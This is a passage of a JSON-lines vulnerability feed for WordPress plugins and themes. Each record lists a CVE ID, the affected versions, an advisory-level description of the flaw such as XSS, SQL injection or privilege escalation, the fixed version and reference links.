version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp\\\/tags\\\/4.6.0.1\\\/pages\\\/page-mainwp-post-page-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp\\\/tags\\\/4.6.0.1\\\/pages\\\/page-mainwp-post-page-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042125\\\/mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042125\\\/mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25106","slug":"NebulaX","versionEndExcluding":"5.0","description":"A vulnerability, which was classified as critical, has been found in webuidesigning NebulaX Theme up to 5.0 on WordPress. This issue affects the function nebula_send_to_hubspot of the file libs\/Legacy\/Legacy.php. The manipulation leads to sql injection. The attack may be initiated remotely. The patch is named 41230a81db0f671c570c2644bc2f80565ca83c5a. It is recommended to apply a patch to fix this issue.","recommendation":"Update to version 5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webuidesigning\\\/NebulaX\\\/commit\\\/41230a81db0f671c570c2644bc2f80565ca83c5a\",\"name\":\"https:\\\/\\\/github.com\\\/webuidesigning\\\/NebulaX\\\/commit\\\/41230a81db0f671c570c2644bc2f80565ca83c5a\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.289163\",\"name\":\"VDB-289163 | CTI Indicators (IOB, IOC, TTP, IOA)\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.289163\",\"name\":\"VDB-289163 | webuidesigning NebulaX Theme Legacy.php nebula_send_to_hubspot sql injection\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0378","slug":"greenshift-animation-and-page-builder-blocks","versionEndExcluding":"5.0","description":"The Greenshift WordPress plugin before 5.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3313cc05-2267-4d93-a8a8-2c0701c21f66\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3313cc05-2267-4d93-a8a8-2c0701c21f66\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13739","slug":"newsletters-lite","versionImpact":"4.9.9.7","versionEndExcluding":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \"to\" parameter in all versions up to, and including, 4.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an admin user into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.7\\\/views\\\/admin\\\/history\\\/view.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.7\\\/views\\\/admin\\\/history\\\/view.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2578a863-4129-4f56-8b18-65b2d2b972e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2578a863-4129-4f56-8b18-65b2d2b972e3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2009","slug":"newsletters-lite","versionImpact":"4.9.9.7","versionEndExcluding":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the logging functionality in all versions up to, and including, 4.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php?rev=3212300#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php?rev=3212300#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257980\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257980\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3825c80c-e4b1-4dd8-be77-38f718920b9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3825c80c-e4b1-4dd8-be77-38f718920b9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8247","slug":"newsletters-lite","versionImpact":"4.9.9.2","versionEndExcluding":"4.9.9.3","description":"The Newsletters plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 4.9.9.2. This is due to the plugin not restricting what user meta can be updated as screen options. This makes it possible for authenticated attackers, with subscriber-level access and above, to escalate their privileges to that of an administrator. Please note that this only affects users with access to edit\/update screen options, which means an administrator would need to grant lower privilege users with access to the Sent & Draft Emails page of the plugin in order for this to be exploited.","recommendation":"Update to version 4.9.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2577102f-6355-4483-bd3d-1948497cb843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2577102f-6355-4483-bd3d-1948497cb843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.1\\\/wp-mailinglist.php#L3279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.1\\\/wp-mailinglist.php#L3279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146287%40newsletters-lite&new=3146287%40newsletters-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146287%40newsletters-lite&new=3146287%40newsletters-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7411","slug":"newsletters-lite","versionImpact":"4.9.9","versionEndExcluding":"4.9.9.1","description":"The Newsletters plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.9.9. This is due to the plugin not preventing direct access to the \/vendor\/mobiledetect\/mobiledetectlib\/export\/exportToJSON.php. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 4.9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cbf52b0-4c7f-40fb-aedb-4c70f6510b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cbf52b0-4c7f-40fb-aedb-4c70f6510b1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135786\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135786\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2472","slug":"LatePoint","versionImpact":"4.9.9","versionEndExcluding":"4.9.9.1","description":"The LatePoint Plugin plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'start_or_use_session_for_customer' function in all versions up to and including 4.9.9. This makes it possible for unauthenticated attackers to view other customers' cabinets, including the ability to view PII such as email addresses and to change their LatePoint user password, which may or may not be associated with a WordPress account.","recommendation":"Update to version 4.9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6215fa9f-06bc-4dc8-b1f5-a3bb75749f1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6215fa9f-06bc-4dc8-b1f5-a3bb75749f1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/aramhairchitects.nl\\\/\",\"name\":\"https:\\\/\\\/aramhairchitects.nl\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0855","slug":"spiffy-calendar","versionImpact":"4.9.8","versionEndExcluding":"4.9.9","description":"The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users\/admins that a page was created by a Contributor+.","recommendation":"Update to version 4.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d5da91e-3f34-46b0-8db2-354a88bdf934\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d5da91e-3f34-46b0-8db2-354a88bdf934\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8722","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The Import any XML or CSV File to WordPress PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbc6ad3f-698e-4dfd-bbba-086f94831bba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbc6ad3f-698e-4dfd-bbba-086f94831bba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/downloads\\\/wp-all-import-annual\\\/?changelog=1\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/downloads\\\/wp-all-import-annual\\\/?changelog=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10861","slug":"ays-popup-box","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The Popup Box \u2013 Create Countdown, Coupon, Video, Contact Form Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the deactivate_plugin_option() function in all versions up to, and including, 4.9.7. This makes it possible for unauthenticated attackers to update the 'ays_pb_upgrade_plugin' option with arbitrary data.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3717e03-9a18-48a1-97d3-1d41c7f93261?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3717e03-9a18-48a1-97d3-1d41c7f93261?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ays-popup-box\\\/tags\\\/4.9.2\\\/admin\\\/class-ays-pb-admin.php#L609\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ays-popup-box\\\/tags\\\/4.9.2\\\/admin\\\/class-ays-pb-admin.php#L609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188357\\\/ays-popup-box\\\/tags\\\/4.9.8\\\/admin\\\/class-ays-pb-admin.php?old=3186262&old_path=ays-popup-box%2Ftags%2F4.9.7%2Fadmin%2Fclass-ays-pb-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188357\\\/ays-popup-box\\\/tags\\\/4.9.8\\\/admin\\\/class-ays-pb-admin.php?old=3186262&old_path=ays-popup-box%2Ftags%2F4.9.7%2Fadmin%2Fclass-ays-pb-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9664","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The WP All Import Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.9.7 via deserialization of untrusted input from an import file. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0099a8d7-827d-4215-9a2b-b3c268fb5e97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0099a8d7-827d-4215-9a2b-b3c268fb5e97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9661","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The WP All Import Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.9.7. This is due to missing nonce validation on the delete_and_edit function. This makes it possible for unauthenticated attackers to delete imported content (posts, comments, users, etc.) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5f8659a-fb3f-4df3-85a6-979751627a9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5f8659a-fb3f-4df3-85a6-979751627a9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\",\"name\":\"https:\\\/\\\/www.wpallimport.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3527","slug":"eventON","versionImpact":"4.9.6","versionEndExcluding":"4.9.7","description":"The EventON Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'assets\/lib\/settings\/settings.js' file in all versions up to, and including, 4.9.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 4.9.6.","recommendation":"Update to version 4.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventon-wordpress-event-calendar-plugin\\\/1211017#item-description__change-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventon-wordpress-event-calendar-plugin\\\/1211017#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/549ca9cf-0183-4c19-9bd5-b6d55a69df31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/549ca9cf-0183-4c19-9bd5-b6d55a69df31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9435","slug":"shiftcontroller","versionImpact":"4.9.66","versionEndExcluding":"4.9.67","description":"The ShiftController Employee Shift Scheduling plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL keys in all versions up to, and including, 4.9.66 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd3a198c-7c24-45b1-95a7-eb16472a51e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd3a198c-7c24-45b1-95a7-eb16472a51e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/4.9.66\\\/shiftcontroller\\\/trunk\\\/hc3\\\/post.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/4.9.66\\\/shiftcontroller\\\/trunk\\\/hc3\\\/post.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6465","slug":"wp-links-page","versionImpact":"4.9.5","versionEndExcluding":"4.9.6","description":"The WP Links Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wplf_ajax_update_screenshots' function in all versions up to, and including, 4.9.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to regenerate the link's thumbnail image.","recommendation":"Update to version 4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b59d281-d5c8-455a-8aa8-b03847bdd45f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b59d281-d5c8-455a-8aa8-b03847bdd45f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-links-page\\\/trunk\\\/wp-links-page-free.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-links-page\\\/trunk\\\/wp-links-page-free.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116973\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116973\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8488","slug":"survey-maker","versionImpact":"4.9.5","versionEndExcluding":"4.9.6","description":"The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Survey fields in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e04edb6-ef37-4ea8-a734-dbdcf689ba9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e04edb6-ef37-4ea8-a734-dbdcf689ba9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155029\\\/survey-maker\\\/tags\\\/4.9.6\\\/includes\\\/class-survey-maker-data.php?old=3153722&old_path=survey-maker%2Ftags%2F4.9.5%2Fincludes%2Fclass-survey-maker-data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155029\\\/survey-maker\\\/tags\\\/4.9.6\\\/includes\\\/class-survey-maker-data.php?old=3153722&old_path=survey-maker%2Ftags%2F4.9.5%2Fincludes%2Fclass-survey-maker-data.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9624","slug":"wp-all-import-pro","versionImpact":"4.9.3","versionEndExcluding":"4.9.4","description":"The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.","recommendation":"Update to version 4.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\",\"name\":\"https:\\\/\\\/www.wpallimport.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7027","slug":"woocommerce-pdf-vouchers","versionImpact":"4.9.3","versionEndExcluding":"4.9.4","description":"The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.9.3. This is due to insufficient verification on the user being supplied during a QR code login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing Voucher Vendor user on the site, if they have access to the user id.","recommendation":"Update to version 4.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6cf27d9-c0be-4cff-8867-19297f6d79d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6cf27d9-c0be-4cff-8867-19297f6d79d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-pdf-vouchers-ultimate-gift-cards-wordpress-plugin\\\/7392046\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-pdf-vouchers-ultimate-gift-cards-wordpress-plugin\\\/7392046\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0630","slug":"wp-slimstat","versionEndExcluding":"4.9.3.3","description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82bdd02-b699-4527-86cc-d60b56ab0c55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82bdd02-b699-4527-86cc-d60b56ab0c55\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4797","slug":"newsletters-lite","versionImpact":"4.9.2","versionEndExcluding":"4.9.3","description":"The Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.","recommendation":"Update to version 4.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de169fc7-f388-4abb-ab94-12522fd1ac92\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de169fc7-f388-4abb-ab94-12522fd1ac92\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5241","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.3","description":"The AI ChatBot for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.8.9 via the qcld_openai_upload_pagetraining_file function. This allows subscriber-level attackers to append \"<?php\" to any existing file on the server resulting in potential DoS when appended to critical files such as wp-config.php.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L376\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25199281-5286-4d75-8d27-26ce215e0993?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25199281-5286-4d75-8d27-26ce215e0993?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5807","slug":"gwolle-gb","versionImpact":"4.9.2","versionEndExcluding":"4.9.3","description":"The Gwolle Guestbook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018gwolle_gb_content\u2019 parameter in all versions up to, and including, 4.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316455\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316455\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/956f86c5-05af-41c3-a779-5b25f62122dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/956f86c5-05af-41c3-a779-5b25f62122dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1453","slug":"category-posts","versionImpact":"4.9.19","versionEndExcluding":"4.9.20","description":"The Category Posts Widget WordPress plugin before 4.9.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
